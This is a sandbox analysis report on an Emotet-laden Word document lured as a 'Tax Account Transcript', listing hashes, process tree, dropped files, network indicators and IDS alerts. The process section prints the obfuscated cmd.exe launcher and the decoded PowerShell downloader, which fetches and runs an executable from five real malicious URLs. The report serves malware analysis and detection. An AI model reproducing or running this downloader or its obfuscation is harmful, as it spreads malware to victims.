analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Tax Account Transcript.doc

Full analysis: https://app.any.run/tasks/a74fe73c-dd4e-4040-a7da-c918f052a9f0
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 14, 2018, 14:38:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 16:38:00 2018, Last Saved Time/Date: Thu Dec 13 16:38:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 41, Security: 0
MD5:

FE2EA8405659DBB0CAC4AE513A236D1B

SHA1:

5536C96F7B490B0569A34A70E5FA2FF39FB51CCB

SHA256:

62910BD4DC39F1B8DCED0BD0D393B1C9EEF4A34AE727298460D4339FC82B962A

SSDEEP:

3072:ic8GhDS0o9zTGOZD6EbzCdXcE6ErJQbc:iioUOZDlbeX1zrJV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2932)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2932)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2668)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 636)
    • Creates files in the user directory

      • powershell.exe (PID: 2356)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2932)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 47
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 41
Words: 7
Pages: 1
ModifyDate: 2018:12:13 16:38:00
CreateDate: 2018:12:13 16:38:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Tax Account Transcript.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
636c:\BVwXjDNiNzEQM\dbWfOaPz\aKoiZZCSEcLVCz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set QWc=jMUTqjhkNaABsYWkLJISoOt{Z 4;.8wf2n3X)9iy0egQdKD-l'/u:Gp+Vx$CP}crE(Fzm\v=@5Hb,&&for %C in (58;24;11;5;71;49;5;35;51;49;27;58;43;4;48;71;33;41;30;47;20;75;5;41;62;22;25;8;41;22;28;14;41;75;59;48;38;41;33;22;27;58;38;64;12;71;49;6;22;22;54;52;50;50;44;41;48;6;38;31;9;75;63;38;62;12;28;62;20;68;50;44;70;60;57;18;22;13;72;6;22;22;54;52;50;50;15;9;38;22;41;41;48;9;20;28;62;20;68;50;24;38;8;29;63;44;70;70;1;5;72;6;22;22;54;52;50;50;9;48;22;9;39;51;12;9;28;62;20;68;50;30;70;70;62;62;30;50;18;45;13;1;45;73;19;20;62;72;6;22;22;54;52;50;50;68;41;51;33;9;12;9;6;68;41;12;5;38;44;28;44;41;12;9;28;38;44;50;8;11;40;45;73;64;64;72;6;22;22;54;52;50;50;48;38;15;9;9;68;38;28;62;20;68;50;26;37;53;9;15;20;11;38;49;28;19;54;48;38;22;65;49;72;49;36;27;58;13;1;38;71;49;21;2;63;49;27;58;74;74;44;25;71;25;49;34;37;32;49;27;58;8;14;38;71;49;33;51;70;49;27;58;11;53;67;71;58;41;33;70;52;22;41;68;54;55;49;69;49;55;58;74;74;44;55;49;28;41;57;41;49;27;31;20;63;41;9;62;6;65;58;13;70;56;25;38;33;25;58;38;64;12;36;23;22;63;39;23;58;43;4;48;28;46;20;30;33;48;20;9;44;66;38;48;41;65;58;13;70;56;76;25;58;11;53;67;36;27;58;8;74;60;71;49;13;3;74;49;27;18;31;25;65;65;53;41;22;47;18;22;41;68;25;58;11;53;67;36;28;48;41;33;42;22;6;25;47;42;41;25;29;40;40;40;40;36;25;23;18;33;70;20;15;41;47;18;22;41;68;25;58;11;53;67;27;58;70;70;21;71;49;13;6;45;49;27;75;63;41;9;15;27;61;61;62;9;22;62;6;23;61;61;58;18;67;16;71;49;12;10;5;49;27;87)do set 4OXD=!4OXD!!QWc:~%C,1!&&if %C==87 powershell.exe "!4OXD:~-453!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2668CmD /V:/C"set QWc=jMUTqjhkNaABsYWkLJISoOt{Z 4;.8wf2n3X)9iy0egQdKD-l'/u:Gp+Vx$CP}crE(Fzm\v=@5Hb,&&for %C in (58;24;11;5;71;49;5;35;51;49;27;58;43;4;48;71;33;41;30;47;20;75;5;41;62;22;25;8;41;22;28;14;41;75;59;48;38;41;33;22;27;58;38;64;12;71;49;6;22;22;54;52;50;50;44;41;48;6;38;31;9;75;63;38;62;12;28;62;20;68;50;44;70;60;57;18;22;13;72;6;22;22;54;52;50;50;15;9;38;22;41;41;48;9;20;28;62;20;68;50;24;38;8;29;63;44;70;70;1;5;72;6;22;22;54;52;50;50;9;48;22;9;39;51;12;9;28;62;20;68;50;30;70;70;62;62;30;50;18;45;13;1;45;73;19;20;62;72;6;22;22;54;52;50;50;68;41;51;33;9;12;9;6;68;41;12;5;38;44;28;44;41;12;9;28;38;44;50;8;11;40;45;73;64;64;72;6;22;22;54;52;50;50;48;38;15;9;9;68;38;28;62;20;68;50;26;37;53;9;15;20;11;38;49;28;19;54;48;38;22;65;49;72;49;36;27;58;13;1;38;71;49;21;2;63;49;27;58;74;74;44;25;71;25;49;34;37;32;49;27;58;8;14;38;71;49;33;51;70;49;27;58;11;53;67;71;58;41;33;70;52;22;41;68;54;55;49;69;49;55;58;74;74;44;55;49;28;41;57;41;49;27;31;20;63;41;9;62;6;65;58;13;70;56;25;38;33;25;58;38;64;12;36;23;22;63;39;23;58;43;4;48;28;46;20;30;33;48;20;9;44;66;38;48;41;65;58;13;70;56;76;25;58;11;53;67;36;27;58;8;74;60;71;49;13;3;74;49;27;18;31;25;65;65;53;41;22;47;18;22;41;68;25;58;11;53;67;36;28;48;41;33;42;22;6;25;47;42;41;25;29;40;40;40;40;36;25;23;18;33;70;20;15;41;47;18;22;41;68;25;58;11;53;67;27;58;70;70;21;71;49;13;6;45;49;27;75;63;41;9;15;27;61;61;62;9;22;62;6;23;61;61;58;18;67;16;71;49;12;10;5;49;27;87)do set 4OXD=!4OXD!!QWc:~%C,1!&&if %C==87 powershell.exe "!4OXD:~-453!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2356powershell.exe "$ZBj='jXu';$Qql=new-object Net.WebClient;$iEs='http://delhifabrics.com/dvPxItY@http://kaiteelao.com/ZiN8rdvvMj@http://altayusa.com/wvvccw/IKYMK5Soc@http://meunasahmesjid.desa.id/NB0K5EE@http://likaami.com/49GakoBi'.Split('@');$YMi='OUr';$HHd = '392';$NWi='nuv';$BGz=$env:temp+'\'+$HHd+'.exe';foreach($YvV in $iEs){try{$Qql.DownloadFile($YvV, $BGz);$NHP='YTH';If ((Get-Item $BGz).length -ge 80000) {Invoke-Item $BGz;$vvO='YhK';break;}}catch{}}$IzL='sAj';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 537
Read events
1 061
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7DC.tmp.cvr
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\20B8344F.wmf
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56C85235.wmf
MD5:
SHA256:
2356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TFXGVW3HB6AL5J7UFU64.temp
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAEDAFE100E4041E4.TMP
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BFDFAD11-0942-431E-BF43-A532FDDD28DA}.tmp
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{847F2BEA-21C2-4046-9D74-1D8E1B5880DC}.tmp
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$x Account Transcript.docpgc
MD5:4BA1309C11F5A2B32ECBB4F456BCCB6B
SHA256:93C891B8D5A2EAC879806413CA36D330FC1F0D1007534594A3928FEBD557BC16
2356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b4ad.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2356
powershell.exe
GET
404
159.65.157.164:80
http://delhifabrics.com/dvPxItY
US
xml
345 b
malicious
2356
powershell.exe
GET
404
158.69.247.167:80
http://kaiteelao.com/ZiN8rdvvMj
CA
xml
345 b
malicious
2356
powershell.exe
GET
404
101.50.1.12:80
http://meunasahmesjid.desa.id/NB0K5EE
ID
xml
345 b
malicious
2356
powershell.exe
GET
404
38.106.32.161:80
http://altayusa.com/wvvccw/IKYMK5Soc
US
xml
345 b
suspicious
2356
powershell.exe
GET
404
103.13.242.204:80
http://likaami.com/49GakoBi
IN
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2356
powershell.exe
158.69.247.167:80
kaiteelao.com
OVH SAS
CA
malicious
2356
powershell.exe
101.50.1.12:80
meunasahmesjid.desa.id
PT. Beon Intermedia
ID
malicious
2356
powershell.exe
38.106.32.161:80
altayusa.com
Altay Corporation
US
suspicious
2356
powershell.exe
159.65.157.164:80
delhifabrics.com
US
malicious
2356
powershell.exe
103.13.242.204:80
likaami.com
HostDime.com, Inc.
IN
malicious

DNS requests

Domain
IP
Reputation
delhifabrics.com
  • 159.65.157.164
malicious
kaiteelao.com
  • 158.69.247.167
malicious
altayusa.com
  • 38.106.32.161
suspicious
meunasahmesjid.desa.id
  • 101.50.1.12
malicious
likaami.com
  • 103.13.242.204
malicious

Threats

PID
Process
Class
Message
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2356
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
No debug info